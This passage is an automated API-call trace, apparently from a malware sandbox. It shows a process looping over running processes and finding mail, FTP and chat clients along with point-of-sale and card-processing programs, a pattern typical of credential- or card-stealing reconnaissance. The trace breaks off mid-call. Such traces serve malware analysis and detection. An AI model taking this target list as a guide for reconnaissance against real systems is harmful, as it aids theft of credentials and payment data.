[0187.662] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0187.664] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0187.669] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0187.671] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0187.673] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0187.674] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0187.676] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0187.678] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0187.680] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0187.682] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0187.684] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0187.686] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0187.688] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0187.690] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0187.691] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0187.693] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0187.695] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0187.697] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0187.699] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0187.701] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0187.703] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0187.707] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0187.708] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0187.710] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0187.713] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0187.714] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0187.716] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0187.719] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0187.721] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0187.724] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0187.726] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0187.728] Process32Next (in: hSnapshot=0x192c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0187.730] CloseHandle (hObject=0x192c) returned 1 [0187.731] Sleep (dwMilliseconds=0x64) [0187.862] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18d8 [0187.878] Process32First (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.881] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0187.883] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0187.885] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.887] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0187.888] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.890] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0187.892] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0187.894] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0187.896] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.897] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.958] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0187.960] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.962] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.964] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.966] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.967] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.969] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.970] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.972] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0187.975] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0187.976] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0187.978] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0187.980] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.982] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0187.983] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0187.985] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0187.987] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0187.989] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0187.990] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0187.992] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.017] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.019] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0188.021] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.023] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.024] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0188.026] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0188.028] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0188.030] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0188.033] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0188.035] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0188.037] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0188.040] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0188.042] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0188.045] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0188.047] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0188.049] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0188.053] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0188.055] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0188.056] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0188.058] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0188.061] Process32Next (in: hSnapshot=0x18d8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0188.064] Process32Next (in: hSnapshot=0x18d8, 